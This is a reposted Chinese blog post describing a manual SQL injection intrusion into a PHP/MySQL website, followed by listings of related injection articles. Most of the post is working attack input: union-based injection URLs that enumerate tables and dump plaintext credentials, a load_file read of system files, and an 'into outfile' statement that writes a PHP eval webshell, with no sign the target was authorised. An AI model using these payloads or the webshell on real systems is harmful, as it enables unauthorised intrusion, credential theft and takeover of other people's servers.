手工注入基本思路

最新推荐文章于 2023-05-21 23:32:45 发布
最新推荐文章于 2023-05-21 23:32:45 发布
阅读量178 收藏
点赞数
文章标签: php 数据库
原文链接:http://www.cnblogs.com/zqjt2/p/5475545.html
版权

手工注入

说下我的基本思路:
1、目标站点环境为:Windows+Apache+Mysql+PHP
2、存在SQL注入,能否直接写一句话木马
3、存在SQL注入,获取数据库中用户口令,登录应用系统后上传webshell
4、获取数据库口令登录phpMyAdimin,用phpMyAdmin写入一句话木马

不想因为使用扫描工具的缘故,导致服务器出现不稳定的现象,所以就纯手工咯。
下面具体来说明下:
1、尝试1=1的情况,正确

  1. http://xxx/xxx.php?id=2900 and 1=1
复制代码



2、尝试1=2的情况,错误,说明这是个整型的注入点

  1. http://xxx/xxx.php?id=2900 and 1=2
复制代码



3、尝试'1'='1'的情况,错误,说明PHP开启了magic_quotes_gpc=on,不能直接利用注入语句写webshell了。还好这里是整型的注入点,如果是字符型的注入点那就没办法了。

  1. http://xxx/xxx.php?id=2900 and '1'='1'
复制代码



4、order by 15,尝试当前注入语句的表中字段个数为15,错误,说明字段数小于15

  1. http://xxx/xxx.php?id=2900 order by 15
复制代码



5、order by 14,尝试当前注入语句的表中字段个数为14,正确,说明字段数等于14

  1. http://xxx/xxx.php?id=2900 order by 14
复制代码



6、联合查询语句,暴出可显示字段

  1. http://xxx/xxx.php?id=2900 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14
复制代码



7、暴出数据库用户、版本、库名和路径信息,运气不错,是root权限。

  1. http://xxx/xxx.php?id=2900 and 1=2 union select 1,2,3,4,5,group_concat(user(),0x5e5e,version(),0x5e5e,database(),0x5e5e,@@basedir),7,8,9,10,11,12,13,14
复制代码



8、读取windows系统文件boot.ini

  1. http://xxx/xxx.php?id=2900 and 1=2 union select 1,2,3,4,5,load_file(0x633a5c626f6f742e696e69),7,8,9,10,11,12,13,14
复制代码



9、暴出当前库中的所有表名,查了下只有一个account表还比较像存放用户名和口令信息的表

  1. http://xxx/xxx.php?id=2900 and 1=2 union select 1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()
复制代码



10、暴出account表中的所有字段名,看到了username和password,很高兴。

  1. http://xxx/xxx.php?id=2900 and 1=2 union select 1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14 from information_schema.columns where table_name=0x6163636f756e74
复制代码



11、暴出username和password字段里的内容,都是明文。

  1. http://xxx/xxx.php?id=2900 and 1=2 union select 1,2,3,4,5,group_concat(username,0x5e,password),7,8,9,10,11,12,13,14 from account
复制代码



12、使用得到的用户名口令尝试登录用户页面和后台页面,均失败。



13、发现该网站有phpMyAdmin,phpMyAdmin是个好东西,可以在magic_quotes_gpc=on的情况下写入一句话。不过得先知道mysql数据库连接口令。用穿山甲跑了下注入点,可以读取出mysql的root和其他账号口令,但都是收费的hash。。想想即使拿到口令,没web目录的绝对路径也不能写一句话啊。


14、搜索了一些phpMyAdmin的暴路径的链接,均失败。

  1. /phpmyadmin/libraries/lect_lang.lib.php
  2. /phpmyadmin/themes/darkblue_orange/layout.inc.php
复制代码



15、忽然,rp爆发了一下下,在根目录下随手尝试了个phpinfo,这不绝对路径就出来了d:/wwwroot。


16、读取配置文件d:/wwwroot/sql2004.php


17、登录phpMyAdmin,写入一句话d:/wwwroot/1.php

  1. select '<?eval($_POST[cmd]);?>' into outfile 'd:/wwwroot/1.php';
复制代码



18、用lanker一句话客户端连接,查看phpinfo,接下来就是上传大马的事了


19、回过头来,在数据库里翻了一番,在数据库名为admin的库中找到了个口令,一下就登录上后台管理页面了。。

 

  注 :原文网址:http://forum.cnsec.org/thread-67707-1-1.html

转载于:https://www.cnblogs.com/zqjt2/p/5475545.html

weixin_30596023
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php手工注入.doc
11-29
php手工注入.doc
sql之手工注入思路
cike_y
08-31 826
由于手工注入时,经常忘记怎么敲,特意写关于sql注入的常用的注入查询,当作备忘笔记 2022/8/29
php mysql 注入_转载:php mysql注入:初步篇
weixin_42427302的博客
01-18 278
本文主要内容出自转载。出自:http://www.rising.com.cn/newsletter/news/2012-05-24/11580.htmlhttp://www.nowamagic.net/librarys/veda/detail/2010注:仅认为理论可行的,并未实践过。一、SQL注入的本质是恶意攻击者将SQL代码插入或添加到程序的参数中,而程序并没有对传入的参数进行正确处理,导致参...
【mysql】sql注入
清风微醺的博客
04-18 2335
sql注入攻击实例mysql_SQL注入攻击案例 SQL注入案例 所谓的sql注入本质上还是执行sql语句 检测注入点 判断是否存在sql注入可能 判断当前表有多少字段 利用order by n select * from tag order by 2; order by n以第n个column排序,如果n大于表中字段个数会报错。 SQL注入常用爆库语句 爆库 SELECT * FROM `tag` where id = 3 union select 1,database(); 查询informat
SQL注入操作流程及实例演示+墨者学院靶场SQL手工注入漏洞测试(MySQL数据库)
ran的博客
01-12 1579
在MYsQL5.0以上版本中,Mysql 有一个系统数据库 information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,相当于利用该表可以进行一次完整的注入,通过查询它获取指定数据库下面的表名、列名、具体数据信息。当输入了一些乱七八糟的内容之后,网页返回“404错误”或者进行了跳转,则说明本网站对输入的内容可能有检测,则说明这个网站大概率没有注入漏洞。返回的了两个数字,分别是“2”、“3”,因此,修改网址上的“2”、“3”为对应系统函数来进行信息收集。可以在参数值前加“-”;
SQL注入攻击实战演示(附源码)
hack0919的博客
03-31 4154
SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一。
手工注入软件
02-24
手工注入辅助工具 用于cookie注入
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
此资源包含:宽字节注入、SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB...
手工注入辅助工具
09-30
手工注入辅助工具
小白学习篇:MYSQL手工注入之多种类多姿势剖析(上)
weixin_64683116的博客
05-21 398
sql手工注入
PHP+Mysql 带SQL注入源码 下载
12-25
PHP+Mysql 带SQL注入源码、下载解压部署到环境中去就行了。
一文带你学习SQL注入
大河之犬的博客
12-21 5223
但需要注意的是,存储过程中也可能会存在注入问题,因此应该尽量避免在存储过程内使用动态的SQL语句。如果无法避免,则应该使用严格的输入过滤或者是编码函数来处理用户的输入数据。下面是一个在Java中调用存储过程的例子,其中。
mysql sql注入例子_sql注入的各种实例情况
weixin_42718924的博客
02-05 653
/////////////////////////////////////命令注入攻击:使用的是system函数执行windows系统dir命令,来显示URL参数dir所指定的子目录的内容。 可以使用escapeshellarg函数来处理命令的参数,防止URI来进行命令注入攻击使用的是passthru函数执行windows系统命令,读取URL参数username所指定的来访者账号,并显示来访者...
SQL注入之MYSQL注入总结
qq_39764475的博客
08-12 1852
简介 information_schema是用于存储数据库元数据的表,它保存了数据库名,表名,列名等信息。 让我们从爆破表名到了可以直接查询。 information_schema是MySQL5.0以上数据库独有,MYSQL4.X的没有,只能进行对库名、表名、列名暴力破解。 基本使用 基本语法 1.建立数据库 mysql> create database mysqltest; Query OK, 1 row affected (0.00 sec) 2.查询所有数据库 mysql> show d
PHP代码审计-sql注入
博客地址 www.sec0nd.top
10-24 1241
最近想学代码审计了,但是我本身的代码水平不高,学的比较基础,适合入门级别的朋友们阅读先学php的审计,后面再学java的吧(java只懂一点点)就不太多的赘述漏洞和代码的基础了,遇到不会的搜索其他人的文章就可以学会的入门我是看的代码审计相关的一些知识后面实战的代码也在这里可以下载的。
PHP代码审计系列基础文章(一)之SQL注入漏洞篇
FreeBuf_的博客
11-14 1062
在审计SQL注入的时候,我们首先要找到对应的传参点,更要多关注代码中正常SQL语句的规则和过滤情况,最重要的是要闭合正常的SQL语句来,最终执行我们想要执行的SQL语句。
MySQL之SQL注入及解决
weixin_47543906的博客
11-23 877
Statement的子接口PreparedStatement PreparedStatement预编译执行者对象 预编译:SQL语句在执行前就已经编译好了,执行速度更快。 安全性更高:没有字符串拼接的SQL语句,所以避免SQL注入的问题 代码的可读性更好,因为没有字符串拼接
mysql中注入演示_SQL注入(案例演示)
weixin_30921875的博客
01-19 228
SQL注入(案例演示)一、SQL注入是什么?在程序事先定义好的 查询语句中添加额外的SQL语句 ,在管理员不知情的情况下实现非法操作,以此来实现 欺骗数据库服务器执行非授权的任意查询 ,从而进一步得到相应的数据信息。SQL注入通俗说就是:通过SQL语句找到破绽,进行非法的数据读取。二、实现步骤说明:用一个简单的查询案列说明 SQL 注入案例使用的为:Java语言与MySQL数据库1.新建数据表1....
php sql注入
技术的搬运工
01-16 2206
在应用程序中,为了和用户交互,允许用户提交输入数据,假如应用程序并没有对用户输入数据进行处理,攻击者可以输入一些跟sql语句相关的字符串(一般带有特殊字符)从而让应用程序执行危险的 SQL 操作,导致泄漏机密数据(比如用户信息)或直接修改删除线上的数据。
手工注入tplmap
最新发布
11-07
手工注入tplmap是一种利用模板注入漏洞的攻击方法,可以通过手动构造恶意的输入数据来实现对目标网站的攻击。在手工注入过程中,攻击者需要先了解目标网站的后台技术和数据库类型,然后通过构造特定的注入语句来实现...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值